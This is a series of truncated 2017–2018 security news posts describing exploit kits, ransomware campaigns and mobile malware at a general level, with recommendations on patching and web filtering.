Exploit kit activity may not be at the level it one was, but the threat has not gone away. Rig exploit kit activity has increased steadily in 2018 and now a new exploit kit has been detected. The exploit kit has been named underminer by Trend Micro researchers, who detected it in July 2018. The Underminer exploit kit is being used to spread bootklits which deliver coinminer malware. The EK is primarily being used in attacks in Japan, although other East Asian countries have also seen attacks with activity now spreading beyond this region. The underminer exploit kit was also detected by Malwarebytes researchers who note that the exploitation framework was first identified by the Chinese cybersecurity firm Qihoo360 in late 2017, when it was being used to deliver adware. Now the exploit kit is being used to deliver Hidden Bee (Hidden Mellifera) cryptocurrency mining malware. Trend Micro notes that evidence has been uncovered that strongly suggests the exploit kit was developed by the developers of Hidden Mellifera coinminer malware. The exploit kit uses complex methods to deliver the payload with different methods used for different exploits. The developers have also incorporated several controls to hide malicious activity including the obfuscation of exploits and landing pages and the use of encryption to package exploits on-the-fly. The EK profiles the user via a user-agent to determine if the user is of interest. If not, the user will be directed to a HTTP 404 error page. If a user is of interest, a browser cookie will be used to identify that user to ensure that the payload will only be delivered once, preventing reinfection and hampering efforts by researchers to reproduce an attack. URLs used in the attacks are also randomized to prevent detection by standard AV solutions. The coinminer is delivered via a bootkit which is downloaded through encrypted TCP tunnels. The underminer exploit kit contains a limited number of exploits: The Adobe Flash Player exploit CVE-2018-4878, the use-after-free Adobe Flash Player vulnerability CVE-2015-5119, and the Internet Explorer memory corruption vulnerability CVE-2016-0189. Patches for all of the vulnerabilities were...
by G Hunt |
July 26, 2018 |
Internet Security News, Network Security
A recent analysis of exploit kit activity by Trend Micro has shown that while exploit kit activity is at a fraction of what it was in 2016, the threat has not gone away. Links to malicious websites hosting exploit kits are still being distributed by spam email and malicious adverts are still being used to redirect web users to malicious websites hosting exploit kits. Most of the exploit kits that were in use in 2016 have all but disappeared – Angler, Nuclear, and Neutrino. There was a rise in Sundown activity in 2017, but activity has now stopped, and Disdain and Terror exploit kits have similarly disappeared. The demise of exploit kits as an attack vector has been attributed, in part, to the arrests of the operators of some of the most commonly used EKs such as Angler, although there have been fewer zero-day vulnerabilities to exploit. Many of the exploits used in exploit kits are for Flash vulnerabilities, and while use of Flash is declining, the creators of exploit kits are still attempting to exploit a handful of these Adobe Flash vulnerabilities. Many threat actors have switched to easier and less time-consuming ways of attacking businesses, but not all. While most exploit kits are operating at a low level, the Rig exploit kit is still in use and has recently been updated once again. Further, there has been a steady increase in Rig exploit kit activity since April. Rig is most commonly used in attacks in Japan, which account for 77% of Rig activity. The GrandSoft exploit kit is still active, although at a much lower level than Rig. This exploit kit was first seen in 2012 although activity all but disappeared until the fall of last year when it became active once again. Japan is also the country most targeted by the GrandSoft exploit kit (55% of activity), while the private exploit kit Magnitude is almost exclusively used in South Korea, which accounts for 99.5% of its activity. For the most part, exploit kits are being used to exploit vulnerabilities that should have been patched long ago, such as the use-after-free vulnerability in Microsoft Windows’ VBScript engine (CVE-2018-8174) which was identified in April 2017 and patched in May 2017. Internet...
by G Hunt |
May 31, 2018 |
Cybersecurity News, Internet Security News
The RIG exploit kit, used on compromised and malicious websites to silently download malware, has been upgraded with a new exploit. Windows Double Kill exploit code has been added to exploit the CVE-2018-8174 vulnerability – a remote code execution vulnerability that was addressed by Microsoft on May 2018 Patch Tuesday. To protect against exploitation of this vulnerability, Windows users should ensure they have applied the latest round of patches, although many businesses have been slow to update their Windows devices, leaving them vulnerable to attack. The vulnerability is in the VBScript engine and how it handles objects in the memory. If the vulnerability is exploited, attackers would gain the same level of privileges as the current user, could reallocate memory, gain read/write access, and potentially remotely execute code on a vulnerable device. The vulnerability has been named ‘Double Kill’ and affects all Windows versions. The Windows Double Kill vulnerability was being actively exploited in the wild when Microsoft released the update on Patch Tuesday. Initially, exploitation of the vulnerability was achieved through phishing campaigns using RTF documents containing a malicious OLE object. If activated, an HTML page was downloaded and rendered through an Internet Explorer library and the VBScript flaw was exploited to download a malicious payload. The attack could also be conducted via a malicious website. In the case of the latter, it does not matter what browser the user has set as default – on unpatched systems the IE exploit could still work. The Windows Double Kill exploit code was posted online this week and it didn’t take long for it to be incorporated into the RIG exploit kit. End users could be directed to the RIG exploit kit through phishing campaigns, malvertising, web redirects, or potentially could visit malicious sites through general web browsing. In addition to the Windows Double Kill exploit, the RIG exploit kit contains many other exploits for a wide range of vulnerabilities. Any individual that lands on a URL with the kit installed could be vulnerable even if the latest Windows patch has already been applied. The threat from...
by G Hunt |
April 20, 2018 |
Cybersecurity News, Internet Security News
There have been significant developments relating to exploit kits in the past few days. The threat actors behind the Magnitude exploit kit have now changed their malicious payload, and the EITest malware distribution network that directed traffic to exploit kits has finally been sinkholed. Magnitude Exploit Kit Switches to GandCrab Ransomware Delivery Exploit kit activity is at a fraction of the level of 2015 and 2016, and in 2017 there was a 62% reduction in the development of exploit kits according to research from Recorded Future. However, exploit kit activity has not fallen to zero and the malicious code is still widely used to deliver malware and ransomware underscoring the continued need for technologies to block these attacks such as web filtering solutions and the continued need to keep on top of patching. Exploit kits often leverage vulnerabilities in Java and Adobe Flash, although more recently it has been Microsoft vulnerabilities that have been exploited due to the fall in Java vulnerabilities and the phasing out of Adobe Flash. One exploit kit that is still being used in extensive attacks, albeit attacks that are highly geographically targeted, is the Magnitude exploit kit. For the past seven months, the Magnitude exploit kit has been delivering the Magniber ransomware payload almost exclusively in South Korea. However, there has been a notable change in the past few days with it also being used to distribute GandCrab ransomware, with the latter not restricted geographically and capable of infecting English language Windows devices. While early variants of GandCrab ransomware were cracked and free recovery of files was possible, there is no known decryptor for the current version of GandCrab ransomware being distributed via Magnitude. While Adobe Flash and Microsoft exploits were commonly used, Magnitude is now using a fileless technique to load the ransomware. This technique makes it much harder to detect. According to Malwarebytes, “The payload is encoded (using VBScript.Encode/JScript.Encode) and embedded in a scriplet that is later decoded in memory and executed.” Once run, the payload is injected into explorer.exe, files are encrypted, and...
by G Hunt |
March 20, 2018 |
Cybersecurity News, Internet Security News
Web-based malware attacks via exploit kits were commonplace in 2016, although in 2017 this mode of attack fell out of favor with cybercriminals, who concentrated on spam email to deliver their malicious payloads. Exploit kit activity is now at a fraction of the level of 2016, although 2017 did see an increase in activity using the Rig and Terror exploit kits. Now, a recent discovery by Proofpoint could see exploit kit activity start to increase once again. A new traffic distribution system is being offered on darknet marketplaces that helps cybercriminals direct users to sites hosting exploit kits and conduct web-based malware attacks. Traffic distribution systems – also known as TDS – buy and sell web traffic and are used to direct web users from one website to another. When a user clicks on a link that is part of a TDS system, they are directed to a website without their knowledge – a website that could host an exploit kit and trigger a malware download. The new TDS – known as BlackTDS – requires threat actors to direct traffic to the service, which then filters that traffic and directs individuals to exploit kits based on their profile data. The service maximizes the probability of the exploit kit being able to download malware onto their device. The service can also be used to determine which malware will be downloaded, based on the profile of the user. Threat actors that sign up to use the service can inexpensively select the exploit kits and malware they want installed with all aspects of the malware distribution service handled by the developers of BlackTDS. The developers also claim their cloud-based TDS includes fresh HTTPS domains that have not been blacklisted and that it is difficult for their cloudTDS to be detected by security researchers and sandboxes. Using spam campaigns and malvertising, threat actors can direct traffic to BlackTDS with all aspects of drive-by downloads handled by the developers. Campaigns being run using BlackTDS have been directing users to the RIG-v, Sundown, and Blackhole exploit kits which are used to download a wide range of keyloggers, ransomware, and other malware variants. The provision of this malicious service...
by G Hunt |
January 24, 2018 |
Cybersecurity News, Internet Security News
According to Kaspersky Lab, one of the most dangerous threats to mobile users is Skygofree malware – A recently discovered Android malware threat that has been described as the most powerful Android malware variant ever seen. Skygofree malware has only recently been detected, but it is the product of some serious development. Kaspersky Lab believes it has been in development for more than three years. The result is a particularly nasty threat that all users of Android devices should take care to avoid. Once it is installed on a device, it has access to a considerable amount of data. It also has some rather impressive capabilities, being capable of 48 different commands. Among its arsenal is the ability to take control of the camera and snap pictures and take videos without the knowledge of the user. It has access to geolocation data so is capable of tracking your every move. Where you go, as well as where you have been. Skygofree malware will steal call records and discover who you have spoken to and when and will read your text messages. The malware can also record conversations and background noise, both for telephone calls and when the user enters a specific location – based on geolocation data – that has been set by the attacker. Whenever you are in range of a WiFi network that is controlled by the attacker, the device will automatically connect, even if WiFi is turned off. It also has access to all information in the phone’s memory, can check your calendar to tell what you have planned, and intercept WiFi traffic. You also cannot privately communicate using WhatsApp with Skygofree malware installed. It abuses the Android Accessibility Service and can view your messages. Skype conversations are similarly not secure. As if that was not enough, the malware also serves as a keylogger, recording all data entered on the device. With such an extensive range of functions, this powerful new malware variant is clearly not the work of an amateur. It is believed to be the product of an Italian intercept and surveillance company called Negg, that is known to work with law enforcement agencies. Kaspersky Lab researcher Alexey Firsh said, “Given the...
by G Hunt |
November 30, 2017 |
Cybersecurity News, Internet Security News
Kaspersky Lab has named ransomware as one of the key threats of 2017, and one that continues to plague businesses the world over. Ransomware attacks in 2017 are down year on year, but ransomware attacks on businesses are up. Ransomware attacks in 2016 were bad, but this year there have been three major attacks that have gone global – WannaCry in May, NotPetya in June, and most recently, the Bad Rabbit attacks in October. Many of the ransomware attacks in 2017 have been far more sophisticated than in 2015 and 2016, while attackers are now using a wider variety of tactics to install the malicious code. At the start of 2016, ransomware was primarily being installed using exploit kits, before attackers switched to spam email as the main method of delivery. Spam email remains one of the most common ways for ransomware to be installed, although each of the above three attacks used exploits for unpatched vulnerabilities. Those exploits had been leaked online by the hacking group Shadow Brokers, all of which had been developed and used by the NSA. While not severe as WannaCry, NotPetya and BadRabbit, exploits were also used by AES-NI and Uiwix ransomware variants. Threat actors are also using remote desktop protocol to gain access to systems to install ransomware, while the use of exploit kits is once again on the rise. There has been a noticeable change in targets since 2015 when ransomware started to be favored by cybercriminals. Consumers were the main targets, although cybercriminals soon realized there was more to be made from attacking businesses. In 2016, 22.6% of ransomware attacks were on business users. The Kaspersky Lab report shows that ransomware attacks on businesses are becoming far more common, accounting for 26.2% of all attacks in 2017. Out of the businesses that experienced a ransomware attack in 2017, 65% said they lost access to a significant amount of data, and in some cases, all of their data. Some businesses have prepared for the worst and have developed ransomware response plans and now have multiple copies of backups, with at least one copy on an unnetworked device. In the event of an attack, data can be recovered. Others have not been so...
by G Hunt |
October 24, 2017 |
Cybersecurity News, Internet Security News
The Magnitude exploit kit is being used to deliver a new malware variant – Magniber ransomware. While the Magnitude EK has been used in attacks throughout the Asia Pacific region, the latest attacks are solely taking place in South Korea. Ransomware and malware attacks in Europe and the Americas are primarily conducted via spam email. Exploit kits having fallen out of favor with cybercriminals over the past year. However, that is not the case in the Asia Pacific region, where exploit kit attacks are still common. An exploit kit is a website toolkit that scans visitors’ browsers for exploitable vulnerabilities. When a vulnerability is identified, it is exploited to download malware onto the user’s system. The download occurs silently and in the case of a ransomware attack, the user is only likely to discover the attack when their files have been encrypted. Magniber ransomware takes its name from the Magnitude EK and Cerber ransomware, the ransomware variant that it has replaced. At present, Magniber ransomware is solely targeting users in South Korea. If the operating system is not in Korean, the ransomware will not execute. While it is not unusual for ransomware campaigns to involve some targeting, it is rare for attacks to be targeted on a specific country. Up until recently, the Magnitude exploit kit was being used to download Cerber ransomware. FireEye reports that those attacks were concentrated in the Asia Pacific region. 53% of attacks occurred in South Korea, followed by the USA (12%), Hong Kong (10%), Taiwan (10%), Japan (9%), and Malaysia (5%). Small numbers of attacks also occurred in Singapore and the Philippines. At the end of September, Magnitude EK activity fell to zero, but on October 15, the payload was updated and attacks were solely conducted in South Korea. To avoid analysis, Magniber ransomware checks whether it is running in a virtual environment. A check is also performed to identify the system language. If the system language is Korean, data is encrypted with AES128 and encrypted files are given the .ihsdj extension. After encryption, the ransomware deletes itself. If the system language is not Korean, the ransomware exists. At...
by G Hunt |
October 12, 2017 |
Internet Security News, Web Filtering
A Social Community Partnership employee fired for viewing pornography at work took legal action against her employer for unfair dismissal. However, Ireland’s Workplace Relations Commission (WRC) has upheld the Partnership’s decision to fire the employee, confirming the sanction was appropriate. In May 2016, the employee was discovered to have viewed pornography on her work computer and was promptly fired for gross misconduct. While the employee denied viewing pornography at work, a review of access logs on her computer revealed pornographic websites had been accessed on seven occasions between September and November 2015. The material accessed included depictions of rape and the abduction of girls. While viewing pornography at work is unacceptable in any office, the nature of the material that was accessed made this an egregious violation of the Partnership’s acceptable Internet usage policy, especially considering the Social Community Partnership works to support children and families. Lack of Individual Logins Makes it Difficult to Attribute Inappropriate Internet Access to Individual Employees The case was not clear cut, as the computers in the reception area where she worked did not require secure logins for each employee. The employee also denied that she had viewed pornography and claimed two other workers used the same computers. She also said that other employees could have used the computers when she was not at her desk. To determine that the employee was the person responsible for violating the company’s acceptable Internet use policy, the Partnership had to compare Internet logs against the work schedule. Multiple employees were found to have been working on four of the seven occasions, but the employee was the only person scheduled to work in the reception area on three of the occasions when pornography was accessed. The employee suggested the sites could have been popups, although the claim was rejected by her employer. To determine whether access was due to a malware infection, an external computer expert was called in to conduct a scan of the computer. The scan confirmed no malware was present that could have redirected the browser to...
by G Hunt |
October 11, 2017 |
Cybersecurity News, Internet Security News
A massive Pornhub malvertising campaign has been detected that potentially resulted in millions of malware infections in the United States, Canada, UK, Australia and beyond. Malvertising is the term given to malicious adverts that dupe website visitors into visiting websites where malware is downloaded or to sites that are used to phish for login credentials. These malverts often appear on legitimate websites, adding to their legitimacy. The malicious sites that users are directed to can download any type of malware – keyloggers, ransomware, spyware or adware. The Pornhub malvertising campaign was used to spread click fraud malware. The hacking group behind the campaign – KovCoreG – used the Kovter Trojan. The malware has persistence and will survive a reboot. Pornhub is one of the most popular adult websites, attracting millions of visitors. The website uses a third-party ad network called Traffic Junky. The attackers managed to sneak their malicious adverts past the controls the ad network has in place against malvertising. The attackers detected the browser being used and redirected users to a website tailored to their browser. The Pornhub malvertising campaign worked on users of Chrome, Internet Explorer/Edge and Firefox. The webpages, which had been expertly crafted to exactly match the colors and fonts of Google, Firefox, and Microsoft and included the relevant logos and branding. The malicious webpages indicated a critical security update was required to secure the user’s browser. Clicking to download the update, and running that update, would result in infection. The Pornhub malvertising campaign was detected by Proofpoint, which notified the ad network and Pornhub. Both acted quickly to remediate the threat, although not before many users had been infected with malware. A Web Filtering Solution Can Block Malvertising Attacks Implementing a web filtering solution in the workplace is not just about preventing your employees from wasting time on Facebook. A web filter is an important part of any layered cybersecurity defense strategy. The latest Pornhub malvertising campaign is a good example of how controlling the websites your employees can access can...
by G Hunt |
September 30, 2017 |
Cybersecurity News, Internet Security News
The cost of cybercrime is 23% higher than last year, according to a new study conducted by the Ponemon Institute on behalf of Accenture. The average annual cost of cybercrime is now $11.7 million per organization, having increased from $9.5 million last year. The Ponemon Institute conducted the 2017 Cost of Cybercrime study on 2,182 security and IT professionals at 254 organizations. Respondents were asked about the number of security breaches they experienced in the past 12 months, the severity of those incidents, and the cost of mitigation. The average number of security breaches experienced by each organization was 130 per year, which is more than twice the number of incidents that were being experienced 5 years ago and 27.4% more than this time last year. The costs of cybercrime were split into four areas: Disruption to businesses processes, data loss, loss of revenue, and damage to equipment. Respondents were asked to rate each based on their cost. While the losses from disruption to the business were not insignificant, they were the least costly. The biggest cost was information loss. The costliest security incidents to resolve were malware attacks, which cost an average of $2.4 million to resolve, although the attacks were considerably more expensive to resolve in the United States where the average losses were $3.82 million per incident. In second place was web-based attacks, costing an average of $2 million globally and $3.4 million in the United States. However, in terms of the amount of disruption caused, insider incidents topped the list, taking an average of 50 days to mitigate. Ransomware attacks took an average of 23 days to resolve. The cost of cybercrime report indicates organizations in the financial services have the highest annual costs, spending an average of $18.28 million per organization. In second place was the energy sector with an average annual cost of $17.20 million. Organizations in the United States had the biggest annual security breach resolution costs, spending an average of $21 million each per year. Bottom of the list was Australia with average annual costs of $5 million. Organizations in the United Kingdom were spending an...
by G Hunt |
August 31, 2017 |
Cybersecurity News, Internet Security News
Earlier this year, the NeutrinoPOS banking Trojan source code was leaked, leading to several new variants of malware being created, the latest being Jimmy Nukebot. In contrast to its predecessor, which was used to steal bank card information, the latest version has lost that functionality. However, Jimmy Nukebot can perform a wide range of malicious functions, serving as a downloader for a wide range of malicious payloads. The malware also acts as a backdoor which will allow the actors behind the new malware to monitor activity an infected device. Security researchers at Kaspersky Lab have analysed Jimmy Nukebot infections and have seen the malware download a wide range of modules including Monero cryptocurrency mining malware, web-injects similar to those used in NeutrinoPOS, and various other modules that modify the functions of the malware. The malware can take screenshots of an infected device and exfiltrate data and could download any malicious payload onto an infected device. Publication of the source code of malware results in an increase in its popularity. With the malware used in more attacks, the probability of it being detected is much higher. In order to evade detection, considerable modification to the malware is required. This could well be the reason why so many changes have been made to the latest iteration. The authors of Jimmy Nukebot took the original source code of the NeutrinoPOS banking Trojan and totally restructured the malware. The way the new malware has been constructed also makes static analysis much more complicated. The new features of the malware make it a formidable threat. Jimmy Nukebot is able to learn about the system on which it is installed and use that information for exploitation, tailoring the payload it delivers based on its environment rather than performing a pre-set malicious activity immediately upon infection. Since the malware passively collects information and responds accordingly, it is unlikely to trigger AV alerts and may remain undetected. Organizations that have the malware installed are therefore unlikely to be aware that their systems have been compromised. Protecting against threats such as this requires...
by G Hunt |
August 31, 2017 |
Cybersecurity News, Internet Security News
Downloading apps from non-official sources potentially places users at risk, but Google Play Store malware infected apps do exist. Google has controls in place to prevent malicious apps from being uploaded to its app store, but those controls are not always 100% effective. Choosing to download apps only from official stores is no guarantee that the apps will be free from malware. Security researchers recently discovered around 300 apps offered through the Google Play store that appear to be legitimate programs, yet are infected with malware that add infected devices to a large botnet. The botnet was being used to launch distributed denial of service attacks (DDoS) on websites. The botnet, dubbed WireX, comprises of tens of thousands of Android devices that are being used in highly damaging cyberattacks. Devices started to be infected in early July, with a steady rise in additions over the following weeks. Even though numbers of compromised devices grew steadily in July, the botnet was only discovered in early August when the WireX botnet started to be used in small scale DDoS attacks. Since then, larger attacks have taken place, mostly targeting the hospitality sector. Those attacks have clogged websites with junk traffic preventing legitimate users from accessing the sites. Some of WireX DDoS attacks involved as many as 160,000 unique IPs. Since devices could conceivably be used to attack websites with multiple addresses, the size of the botnet has been estimated to be around 70,000 devices. The growth of the botnet was soon attributed to malicious apps, with researchers discovering around 300 Google Play Store malware infected apps. Google has now disabled those apps and is in the process of removing them from devices. The apps included video players, battery boosters, file managers and ringtones. The apps were not simply malware, as users would undoubtedly attempt to delete the apps if they failed to perform their advertised functions. The apps all worked and users who downloaded the apps were unaware that their devices were being used for malicious purposes. The malware used a ‘headless browser’ which was able to perform the functions of a standard...
by G Hunt |
August 3, 2017 |
Cybersecurity News, Internet Security News
A new mobile malware threat has been discovered – Invisible Man Malware – that is being installed via fake software updates. Invisible Man malware is a keylogger that has been designed to obtain banking credentials. While the malware is not new – it has been around for four years – it is frequently updated, with a new variant discovered that takes advantage of the accessibility services on Android devices. As the name suggests, Invisible Man malware runs silently on infected devices unbeknown to the user. The malware is an overlay that sits atop of legitimate banking apps and intercepts inputs as they are entered on the device. It also allows the attackers behind the malware to intercept text messages, in particular, those used for two-factor authentication and codes sent by banks to authorize transactions. Once installed on a device it has administrator rights to all Android accessibility services, is installed as the default SMS app and has rights to send and receive SMS messages, make calls, and access contacts on the phone. It can also take screenshots and prevents itself from being uninstalled, according to Kaspersky Lab. Invisible Man malware has been developed for attacks in Australia, France, Germany, Poland, Singapore, Turkey and the UK, working as a keylogger over 63 banking apps. All data collected is immediately transferred to its C2 server. Kaspersky Lab reports that Invisible Man malware is primarily being installed on devices using fake software updates, specifically fake Flash Player updates on malicious websites via a downloaded apk file. Beware of Fake Software Updates The latest attacks highlight an important point. If you receive a warning on screen telling you that your software is out of date, don’t click and download the update. In this case, the user will be asked to confirm installation, and will be required to provide this app with administrator rights to accessibility services. Fake software updates are one of the most common methods used to distribute malware, bloatware, adware, ransomware and other nasties. Given the frequency of software updates now being released to address recently found vulnerabilities, your software may...
by G Hunt |
July 31, 2017 |
Cybersecurity News, Internet Security News
A new study has shown that cybercriminals have generated ransomware profits in excess of $25 million over the past two years, clearly demonstrating why cryptoransomware attacks have soared. There is big money to be made in this form of cyber extortion. The bad news is that with so many organizations paying to recover their files, the ransomware attacks will continue and will likely increase. Ransomware attacks are profitable because users are still failing to back up their data. Google’s figures suggest that even though the threat of data deletion or encryption is high, only 37% of computer users back up their data. That means if ransomware encrypts files, the only option to recover data is to pay the ransom demand. Figures from the FBI estimated ransomware payments to have exceeded $1 billion in 2016; however, it is difficult to accurately calculate ransomware profits since the authors go to great lengths to hide their activities. Ransomware profits are difficult to track and companies are reluctant to announce attacks and whether payment has been made. Two notable exceptions were the South Korean hosting company Nayana that was attacked and had 153 Linux servers and 3,400 customer websites encrypted. The firm paid 1.2 billion Won – approximately $1 million – for the keys to unlock the encryption. Recently, a Canadian company has reportedly paid a ransom of $425,000 to recover its files, although the identity of the firm is still unknown. Now, a study conducted by Google, with assistance from Chainalysis, the University of California at San Diego, and New York University’s Tandon School of Engineering has shed some light on actual ransomware profits. The study involved an analysis using blockchains and Bitcoin wallets known to have been used to collect ransomware payments. The researchers also used reports from victims and monitored network traffic generated by victims of ransomware attacks to help track where payments were sent. The study looked at the top 34 ransomware strains and determined more than $25 million has been collected in the past two years. 95% of payments were cashed out using the Bitcoin trading platform BTC-e. Google has...
by G Hunt |
July 26, 2017 |
Cybersecurity News, Internet Security News
It has been a long time coming, and we are not quite there yet, but Adobe Flash is about to die. The long, slow drawn out death of Adobe Flash will continue for another three years yet, with Adobe finally confirming that it will be pulling the plug by December 31, 2020. By then, all updates for Adobe Flash will stop and the we will all enter a Flash free age. Until then, Adobe is committed to working with partners to ensure Flash remains as secure as possible and updates will continue until that time. However, Adobe is already trying to encourage businesses to start switching to other standards such as HTML5. The decision to finally put Flash out of its misery was made because other platforms and technology have “matured enough and are capable enough to provide viable alternatives to the Flash player,” according to Adobe. In 2005, Flash was on 98% of all computers, and even three years ago it was being used by 80% of desktop users on a daily basis. Today, helped in no short part but the serious security flaws in the platform and the switch to mobile devices from PCs, usage has fallen to just 14%. Google is not supporting Flash anymore and has not done so for Android since 2012. Apple has never supported the plug-in on its mobile devices and Firefox, Chrome, Edge and Safari no longer run Flash content automatically. Even Internet Explorer will disable Flash by default in 2019, ahead of its official death date the following year. Of course, just stopping updates does not mean that Flash will cease to exist. But given the rate that vulnerabilities in Flash are now being discovered, anyone still using Flash by 2020 will be wide open to attack as soon as the updates stop. However, by then there will be far fewer websites using Flash and fewer devices with the Flash plug-in installed. The Internet will most likely be a safer place without Flash, but what will happen to all the hackers who are currently developing exploits for Flash vulnerabilities? They will not also decide to retire. Instead they will put their efforts into something else. What that is of course remains to be seen. Three years may seem like an awfully long time, but there are still many...
by G Hunt |
July 26, 2017 |
Cybersecurity News, Internet Security News
Stantinko malware may only have recently been detected, but it is far from a new malware variant. It has been in use for the past five years, yet has only recently been identified. During the past five years, Stantinko malware has spread to more than 500,000 devices and has been operating silently, adding infected systems to a large botnet, with the majority of infected machines in Russia and Ukraine. The botnet has primarily been used to run a largescale adware operation. The malware installs the browser extensions Teddy Protection and The Safe Surfing, which appear to users to be legitimate apps that block malicious URLs. These apps are legitimate if downloaded via the Chrome Web Store, but they are not if they are installed by Stantinko. The Stantinko versions contain different code that is used for click fraud and ad injection. ESET reports that additional plugins known to be installed by Stantinko malware include Brute-Force and Search Parser which are used for Joomla/WordPress brute force attacks and to anonlymously search for Joomla/WordPress sites. Remote Administrator is a fully functional back door and Facebook Bot can generate fake likes, create new accounts, or add friends on Facebook, virtually undetected. While click fraud is the primary goal of the attackers, Stantinko malware can perform a wide range of functions. Since Stantinko includes a loader, enabling threat actors to send any code to an infected device via their C2 server and run the code. ESET researchers say the malware uses Windows services to perform backdoor activities and brute force attacks on WordPress and Joomla websites. Once access is gained, the attackers sell on the login credentials to other cybercriminal groups, according to ESET. That’s not all. ESET says Stantinko malware could be used to perform any task on an infected host. The malware and botnet have remained undetected for so long due to their ability to adapt to avoid being detected by anti-malware solutions. The malware also uses code encryption to avoid detection. Users would be unlikely to realize that anything untoward was happening on their machine. The tasks performed by the malware involve low CPU activity...
by G Hunt |
July 21, 2017 |
Internet Privacy, Internet Security News
UK porn filtering controls are expected to be introduced next year to make it harder for minors to access – accidentally or deliberately – pornographic material over the Internet. The government has proposed a new requirement that will make it mandatory for all sites hosting adult or pornographic content to conduct age verification checks before adult content is displayed. From April next year, a yet to be decided regulator – most likely the British Board of Film Classification – will be able to block websites hosting pornography if they do not conduct checks to ensure visitors are over the age of 18. Blocks are likely to be applied at the ISP level and the sites could be barred from taking credit card payments from the UK if they do not comply. The change to UK porn filtering controls would mean minors would be prevented from accessing pornographic material. Digital minister, Matt Hancock, explained the move would mean “UK will have the most robust internet child protection measures of any country in the world.” While many adult websites ask the user if they are over 18 before content is displayed to prevent accidental access, further controls would be required to verify age. One of the easiest ways to do that is by forcing the visitor to submit their credit card details. In the UK, it is not possible for individuals under the age of 18 to be issued with a credit card. The new UK porn filtering controls have been welcomed by some groups – the National Society for the Prevention of Cruelty to Children (NSPCC) for example – but the move has raised many concerns. Age verification checks are likely to result in the operators of the websites maintaining a database of site users, even individuals who do not pay for access. The database is likely not only to include details supplied in the verification checks, but include profiling and viewing histories. It is possible that large volumes of highly sensitive data could be collected on millions of users. Any website that collects sensitive consumer data is a target for hackers. The databases that could be built by adult content providers would be an even bigger target. Not only could information be used for...
by G Hunt |
June 29, 2017 |
Cybersecurity News, Internet Security News
The NotPetya ransomware attacks on Tuesday this week initially looked like another WannaCry-style attack. They used similar NSA exploits to spread infections, ransoms were demanded and like WannaCry, the attacks rapidly spread around the globe. However, closer inspection of NotPetya ransomware has revealed that all may not be as it first appeared. The purpose of ransomware is to lock files with powerful encryption to prevent files from being accessed. A ransom demand is then issued. Payment of the ransom will see the keys to unlock the decryption supplied. Organizations get their files back. The attackers get a big payday. There have been many cases when ransomware has encrypted files, yet the attackers are not capable of supplying the keys. These attacks have tended to be conducted by amateurs or show the authors have been sloppy and failed to check that decryption is possible. If attackers do not make good on their promise to supply valid keys to unlock the encryption, word will soon spread on social media and security websites that paying the ransom will not enable organizations to recover their files. That means the campaign will likely not be profitable. Developing a new ransomware variant is not a quick and easy process. It does not make sense for a threat actor to go to all the trouble of developing ransomware, devising a sophisticated multi-vector campaign to spread the ransomware, but then forget about essential elements that make it possible to receive ransom payments. That is, unless the aim of the campaign is not to make money. In the case of the recent NotPetya ransomware attacks, the actors behind the campaign appear to have made some serious errors if making money was their aim. First, the ransom demand was only $300 per infected machine, which is well below the current average payment demanded by ransomware gangs. As for the errors, they were numerous. Petya ransomware, which NotPetya closely resembles, provides the victim with an installation ID. That ID is unique to the victim. It is used to determine who has paid the ransom. In the latest attacks, the IDs consisted entirely of random characters. As Kaspersky Lab explained, that means it is...
by G Hunt |
June 9, 2017 |
Cybersecurity News, Internet Security News
Hackers have been phishing for domain credentials and using the logins to gain access to websites and create malicious subdomains – a process called domain shadowing – and using those subdomains as gates that redirect users to sites loaded with the RIG exploit kit. The RIG exploit kit probes for vulnerabilities in web browsers and exploits flaws to download malware. Those malware downloads usually occur silently without the users’ knowledge. All that is required for infection is an out of date browser or plugin and for the victim to be directed to a website hosting the exploit kit. RIG has primarily been used to download banking Trojans and Cerber ransomware. While use of the exploit kit is nowhere near the level of Angler prior to its demise, the Rig exploit kit is now the leading EK used by cybercriminals and activity has increased sharply in recent months. Cybercriminals have been generating traffic to the malicious subdomains using malvertising campaigns – malicious adverts sneaked onto third party ad networks. Those ads are then syndicated across a wide range of high traffic websites and redirect visitors to the malicious subdomains. Other techniques used to drive traffic to the sites include malicious Chrome popups and iframes inserted into compromised WordPress, Drupal and Joomla! Websites. Tens of thousands of subdomains have been created on legitimate websites that have been compromised by hackers. Cybercriminals are understood to have been obtaining login credentials to websites using malware. The subdomains were mostly created on websites hosted by GoDaddy. The domain registrar has been working with RSA Security and independent security researchers to identify the compromised websites and take down the subdomains. In total, around 40,000 subdomains were taken down in May. While this take down is certainly good news, it is unclear how much of an effect it will have on Rig EK operations as little is known about the RIG infrastructure and the total number of websites that have had malicious subdomains added. However, RSA Security says these takedowns have resulted in “a significant loss of capabilities to RIG operations”. RSA and GoDaddy are working to...
by G Hunt |
May 24, 2017 |
Cybersecurity News, Internet Security News
The Terror exploit kit is a relative newcomer to the EK scene, yet it is evolving rapidly. Since the demise of Angler, exploit kit activity has waned. However, the threat from new exploit kits such as Terror is growing. Exploit kits probe for vulnerabilities in browsers or plugins. When an individual is directed to a website hosting an exploit kit, the EK searches for exploitable vulnerabilities. When exploitable vulnerabilities are discovered, the EK silently downloads malware or ransomware. Exploit kits can be hosted on compromised websites or sites run by the attackers. Cybercriminals use a variety of techniques to get traffic to the sites. Links can be sent via spam email or via instant messaging services and social media sites. Malicious advertisements – termed malvertising – can be hosted on third party ad networks. Those ads are then served in sidebars on any number of legitimate, high traffic websites. Web redirects are also used to divert traffic to malicious sites hosting exploit kits. If an individual with out of date plugins or older browser version visits such a malicious site, and an exploit has been loaded to the kit for a vulnerability in the browser, a malicious payload can be silently downloaded onto the user’s device. In recent months, spam email has become the main attack vector used by cybercriminals. However, exploit kit activity appears to be increasing with the Terror exploit kit fast evolving into a significant threat. The Terror exploit kit used to use a ‘carpet-bombing’ approach, sending a wide range of exploits at the end users system in the hope that one would be effective. Such an approach is not particularly sophisticated. However, Terror has now been updated and attacks can be tailored based on the user’s browser environment. Exploits that have a high probability of being successful are then delivered. The Terror exploit kit can now determine which exploits to drop based on the victim’s browser version, the plugins that have been installed, or patch level, according to the researchers who discovered the update. Protecting against exploit kits requires browsers and plugins to be kept 100% up to date and vulnerability free, which...
by G Hunt |
May 18, 2017 |
Cybersecurity News, Internet Security News
